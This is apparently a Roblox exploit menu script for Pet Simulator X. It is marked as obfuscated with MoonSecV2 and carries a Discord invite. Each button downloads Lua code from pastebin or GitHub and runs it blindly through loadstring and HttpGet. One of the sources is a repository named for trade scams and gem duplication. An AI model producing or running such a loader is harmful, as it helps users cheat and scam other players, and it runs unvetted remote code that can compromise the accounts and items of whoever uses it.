_, Protected_by_MoonSecV2, Discord = 'discord.gg/gQEH2uZxUk'


local Library = loadstring(game:HttpGet("https://pastebin.com/raw/vff1bQ9F"))()
local Window = Library.CreateLib("Premium Binbinvoroblox11 Gui", "Ocean")
local Tab = Window:NewTab("Pet Simulator X")
local Section = Tab:NewSection("Pet Simulator X")
Section:NewButton("CLOUD HUB GUI", "CLOUD HUB GUI", function()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/BadScripters/CloudHub/main/hub"))()
end)
Section:NewButton("Nike Fucker V4.9", "Nike Fucker V4.9", function()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/RobloxMguiSetup/Trade-scam-more/main/dupe%2B%20dupe%20gems", true))()
end)
Section:NewButton("BLACK TRAP HUB NEW", "BLACK TRAP HUB NEW", function()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/S4nZz/bt_project/main/Games/BlacktrapScript.txt'))()
end)
Section:NewButton("Project-WD Hub", "Project-WD Hub", function()
    loadstring(game:HttpGet("https://raw.githubusercontent.com/Muhammad6196/Project-WD/main/Main.lua"))()
end)
Section:NewButton("jmes Hub", "jmes Hub", function()
    loadstring(game:HttpGetAsync("https://raw.githubusercontent.com/jmesfo0/RobloxScripts/main/psx-jmes.lua"))()
end)
Section:NewButton("no name ", "no name", function()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/SHAREHACK/script/main/psx'))()
end)
Section:NewButton("boy Hub", "boy Hub", function()
    loadstring(game:HttpGet('https://raw.githubusercontent.com/Solx69/Shit-Boy-Hub-Main/main/Pet%20Sim%20X'))()
end)
